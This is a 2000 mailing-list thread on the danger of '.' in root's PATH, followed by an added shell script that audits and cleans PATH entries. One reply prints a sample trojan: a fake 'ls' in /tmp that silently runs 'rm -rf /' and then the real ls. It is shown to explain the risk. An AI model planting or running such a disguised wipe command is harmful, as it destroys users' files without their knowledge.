I would think that with all the known problems with running rm -rf from
root that someone would get smart and find a way to disable its use from
root. rm -r from root would accomplish the same but force the user to sit
there and manually approve each deletion.
Granted there are times when as a sys adm I use rm -rf, especially in
deleting a user's file system when said individual is no longer active on
the system. But this is rare enough for me that disabling rm -rf from
root would be worth the extra work I'd have to do later.
Glen
On Mon, 31 Jul 2000, Jake McHenry wrote:
>
>ok, thanks for the info. I never really thought of it like that, someone else
>running as root. Even though they would never get my password, I guess there are
>other ways of becoming root. Thanks again.
>
>jake
>
>
>On Mon, 31 Jul 2000, Charles Galpin wrote:
>
>--I didn't see anyone answer this, so I'll give it a stab.
>--
>--It protects you against trojans. The beauty of the unix security model is
>--that a 'regular' user can't do much wrong to the system, only to
>--themselves. However if you can get root to run something malicious (like
>--"rm -rf /") then you can really cause some damage.
>--
>--If root has "." in their path, then programs in the current directory may
>--be found and run. If it's at the end of the path then the risk is much
>--less, but still there.
>--
>-- *** DO NOT TRY THIS **
>--A trivial example of a trojan would be creating a file called 'ls' in /tmp
>--with the following contents
>--
>--#!/bin/sh
>--rm -rf / >& /dev/null&
>--/bin/ls
>--
>--If this were made executable and someone with "." in their path before
>--/bin ran this, you might have a lot of files missing before you realize
>--it (since it does indeed do a ls as well). If it were root, then you would
>--lose all your files.
>--
>--I hope this has been a clear enough description to scare the hell out of
>--you and remove "." from your regular accounts as well. Sadly enough you
>--won't (like me) and probably have rm aliased to 'rm -f' even though it's
>--bitten you in the ass several times already. Hey, that's what backups are
>--for right? Of course I am nowhere near that casual with my root accounts.
>--
>--charles
>--
>--On Fri, 28 Jul 2000, Steve Arnold wrote:
>--
>--> Jake McHenry wrote:
>-->
>--> > What is such a security error with what I said? I've never done what I said, but
>--> > about the same thing. I have root's login disabled, so I have to su to root. I
>--> > have the . at the end of my user's path, and when I su to root, it keeps my
>--> > paths, including the ., so I always can run the program in the current
>--> > directory. I only su to root when I need to, don't use it for everything, hence
>--> > why I did it this way. I've always done this. Can someone please explain to me
>--> > why it is such a security problem? And sorry to the person that I told this to,
>--> > if I realized this was a mistake, I wouldn't have told him to do that.
>-->
>--> I'd like to hear a good answer on this one, too. Although I do the
>--> "./blah" thing for messing around with stuff in the current directory,
>--> I'm not sure what the big deal is. Is it just the possibility of
>--> running something un-intended as root that's the big danger here?
>-->
>--> Don't leave us dangling...
>-->
>--> Steve
>-->
>-->
>-->
>--> --
>--> To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
>--> as the Subject.
>-->
>--
>--
>--
>--
>
>Jake McHenry
>[EMAIL PROTECTED]
>
>
>
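
An added example, not part of the original thread: a POSIX shell check for the PATH problem Charles describes, usable after `su` in the situation Jake mentions where root inherits the user's PATH. The function names `audit_path` and `clean_path` and the sample PATH are made up for illustration; the check also flags empty and relative entries, which the shell resolves against the current directory just like ".".

```shell
#!/bin/sh
# audit_path PATHSTRING
# Prints one line per entry that makes the shell search the current
# directory and returns non-zero if any such entry exists.
audit_path() {
    rest="${1}:"          # trailing ":" lets the loop see a final empty entry
    index=0
    status=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        index=$((index + 1))
        case $entry in
            "") echo "entry $index: empty (searches the current directory)"; status=1 ;;
            .)  echo "entry $index: . (searches the current directory)"; status=1 ;;
            /*) ;;        # absolute entries are fine for this check
            *)  echo "entry $index: relative path $entry"; status=1 ;;
        esac
    done
    return $status
}

# clean_path PATHSTRING
# Prints PATHSTRING with every non-absolute entry dropped, order preserved.
clean_path() {
    rest="${1}:"
    out=
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            /*) out="${out:+$out:}$entry" ;;
        esac
    done
    printf '%s\n' "$out"
}

# Constructed sample: a user PATH with "." at the end, as in the thread.
sample='/usr/local/bin:/usr/bin:/bin:.'
audit_path "$sample" || echo "cleaned PATH: $(clean_path "$sample")"
```

Running `audit_path "$PATH"` from a root shell shows whether the inherited PATH still contains a current-directory entry.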